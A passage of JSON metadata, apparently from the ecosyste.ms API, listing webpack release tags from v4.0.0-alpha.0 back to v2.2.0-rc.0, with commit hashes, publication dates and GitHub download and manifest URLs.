2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.g